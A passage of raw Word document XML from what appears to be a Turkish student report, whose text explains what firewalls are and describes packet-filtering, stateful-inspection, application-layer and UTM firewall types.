      </w:r>
      <w:r>
        <w:t xml:space="preserve">rini sağlayabilir. Bu iyi yapar </w:t>
      </w:r>
      <w:r w:rsidRPr="002317C9">
        <w:t>duyu ve iyi güvenlik.</w:t>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jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="007F7C0D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="007F7C0D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F7C0D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48714B44" wp14:editId="3D6144BF">
            <wp:extent cx="2926080" cy="3017520"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4112" name="Resim 4112"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Section 2.2.16-2.2.19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Merve ÇAKIR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150757026</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Pr="007F7C0D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pP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pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>GÜVENLİK DUVARI NEDİR? VE TÜRLERİ:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Güvenlik duvarı</w:t>
      </w:r>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> veya </w:t>
      </w:r>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ateş duvarı</w:t>
      </w:r>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>, (</w:t>
      </w:r>
      <w:hyperlink r:id="rId114" w:tooltip="İngilizce" w:history="1">
        <w:r w:rsidRPr="00552040">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>İngilizce</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Firewall</w:t>
      </w:r>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>), güvenlik duvarı yazılımı, bir kural kümesi temelinde ağa gelen giden paket trafiğini kontrol eden donanım tabanlı ağ güvenliği sistemidir. Birçok farklı filtreleme özelliği ile </w:t>
      </w:r>
      <w:hyperlink r:id="rId115" w:tooltip="Bilgisayar" w:history="1">
        <w:r w:rsidRPr="00552040">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>bilgisayar</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> ve ağın gelen ve giden paketler olmak üzere </w:t>
      </w:r>
      <w:hyperlink r:id="rId116" w:tooltip="İnternet" w:history="1">
        <w:r w:rsidRPr="00552040">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>İnternet</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> trafiğini kontrol altında tutar. </w:t>
      </w:r>
      <w:hyperlink r:id="rId117" w:tooltip="İP filtreleme (sayfa mevcut değil)" w:history="1">
        <w:r w:rsidRPr="00552040">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>İP filtreleme</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:hyperlink r:id="rId118" w:tooltip="Port filtreleme (sayfa mevcut değil)" w:history="1">
        <w:r w:rsidRPr="00552040">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>port filtreleme</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:hyperlink r:id="rId119" w:tooltip="Web" w:history="1">
        <w:r w:rsidRPr="00552040">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>Web</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> filtreleme, içerik filtreleme bunlardan birkaçıdır. </w:t>
      </w:r>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:hyperlink r:id="rId120" w:tooltip="Vikipedi:Kaynak gösterme" w:history="1">
        <w:r w:rsidRPr="00552040">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
            <w:i/>
            <w:iCs/>
            <w:sz w:val="17"/>
            <w:szCs w:val="17"/>
            <w:vertAlign w:val="superscript"/>
          </w:rPr>
          <w:t>kaynak belirtilmeli</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Birçok kişisel bilgisayar işletim sistemleri, Internet'ten gelen tehditlerine karşı korumak için yazılım tabanlı güvenlik duvarları içerir.Ağlar arasında veri aktaran birçok yönlendirici firewall bileşenleri içerir ve, birçok firewall temel yönlendirme işlevlerini gerçekleştirebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>İnternet küresel kullanım ve bağlantı açısından oldukça yeni bir teknoloji iken Firewall teknolojisi 1980'lerin sonunda ortaya çıkmıştı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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="72" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Paket filtrelemeli güvenlik duvarı</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Paket filtreleri, Internet üzerindeki bilgisayarlar arasında transfer edilen paket başlıklarını inceleyerek hareket eder.Bir paket güvenlik duvarından geçtiği sırada eğer başlık bilgisi, güvenlik duvarı üzerinde daha önceden tanımlanmış olan, "güvenlik duvarı paket filtresi" ile eşleşirse, ya paket atılır ya da reddedilerek kaynağa hata mesajları gönderilir.</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Bu tür paket filtreleme, paketin mevcut ağ akışının bir parçası olup olmadığına bakmaz.</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Paket filtrelemeli güvenlik duvarı </w:t>
      </w:r>
      <w:hyperlink r:id="rId121" w:tooltip="OSI modeli" w:history="1">
        <w:r w:rsidRPr="00552040">
          <w:rPr>
            <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="tr-TR"/>
          </w:rPr>
          <w:t>OSI Modeli</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>'nin ilk 3 katmanında çalışır. Paket başlığındaki bilgilerin hepsini baz alarak filtreleme işlemi gerçekleştirilebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="72" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Durumlu denetim güvenlik duvarı</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hyperlink r:id="rId122" w:tooltip="Veri" w:history="1">
        <w:r w:rsidRPr="00552040">
          <w:rPr>
            <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="tr-TR"/>
          </w:rPr>
          <w:t>Veriyi</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t> kaynağından hedefine kadar takip eder. Uygulama tabakası güvenlik duvarı ise yalnızca gelen ve giden verinin başlık kısımlarını kontrol eder ve uygulama katmanındaki protokolleri kısıtlayarak güvenliği sağlar. Örneğin </w:t>
      </w:r>
      <w:hyperlink r:id="rId123" w:tooltip="HTTP" w:history="1">
        <w:r w:rsidRPr="00552040">
          <w:rPr>
            <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="tr-TR"/>
          </w:rPr>
          <w:t>HTTP</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t> protokolü üzerinden bir Web sitesinin erişiminin engellenmesi buna örnek olarak verilebilir. Daha gelişmiş olanı durumlu denetim özellikte olanlar olup daha çok büyük </w:t>
      </w:r>
      <w:hyperlink r:id="rId124" w:tooltip="Bilgisayar ağı" w:history="1">
        <w:r w:rsidRPr="00552040">
          <w:rPr>
            <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="tr-TR"/>
          </w:rPr>
          <w:t>ağların</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId125" w:tooltip="İnternet" w:history="1">
        <w:r w:rsidRPr="00552040">
          <w:rPr>
            <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="tr-TR"/>
          </w:rPr>
          <w:t>İnternet</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t> ve iç ağdaki trafiklerini kontrol eder.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="72" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Uygulama katmanı güvenlik duvarı</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hyperlink r:id="rId126" w:tooltip="OSI Modeli" w:history="1">
        <w:r w:rsidRPr="00552040">
          <w:rPr>
            <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="tr-TR"/>
          </w:rPr>
          <w:t>OSI Modelinde</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t> uygulama katmanı düzeyinde çalışır. En sık kullanılan güvenlik duvarı tekniğidir. Uygulama katmanındaki güvenlik duvarı, gelen paketin veri kısmına kadar olan tüm paket başlıklarını açıp kontrol edebilir ve filtreliyebilir.</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Uygulama katmanında filtreleme yapmanın en önemli avantajı bazı uygulamalar ve protokollerin anlaşılır olmasıdır (FTP, DNS, HTTP gibi).</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Günümüzdeki güvenlik duvarları da sadece port kapamak amaçlı kullanılmıyor. Yeni nesil güvenlik duvarları da U.T.M. (Unified Threat Management) (güvenlik duvarı, </w:t>
      </w:r>
      <w:hyperlink r:id="rId127" w:tooltip="Antivirüs" w:history="1">
        <w:r w:rsidRPr="00552040">
          <w:rPr>
            <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="tr-TR"/>
          </w:rPr>
          <w:t>antivirüs</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>, anti</w:t>
      </w:r>
      <w:hyperlink r:id="rId128" w:tooltip="Yığın mesaj" w:history="1">
        <w:r w:rsidRPr="00552040">
          <w:rPr>
            <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="tr-TR"/>
          </w:rPr>
          <w:t>spam</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>, IDS/IPS, VPN, </w:t>
      </w:r>
      <w:hyperlink r:id="rId129" w:tooltip="Yönlendirici" w:history="1">
        <w:r w:rsidRPr="00552040">
          <w:rPr>
            <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="tr-TR"/>
          </w:rPr>
          <w:t>yönlendirici</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en" w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>router</w:t>
      </w:r>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>) gibi özellikleri olan) tümleşik cihazlardır. Her ne kadar bir dönem bilinen ateş duvarı markaları U.T.M. cihazlarının hantal ve başarız olduğunu iddia etse de günümüzde tüm ateş duvarı üreticileri U.T.M. cihazlarını üretmektedir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Bilinen U.T.M. cihaz markaları Cisco ASA, Fortinet, Labris, Juniper, NetSafe-Unity, Netscreen ve Symantec serisidir. Bu cihazlar üzerinde port protokol bazısında kısıtlama yapabilir. Web filtrelemesi (terör, şiddet, silah gibi kategorilerine göre yasaklama) yapabilir. Dosya indirme gibi işlemleri durdurabilir. İyi kurulmuş bir güvenlik duvarı, bilgisayarı bir </w:t>
      </w:r>
      <w:hyperlink r:id="rId130" w:tooltip="Daktilo" w:history="1">
        <w:r w:rsidRPr="00552040">
          <w:rPr>
            <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
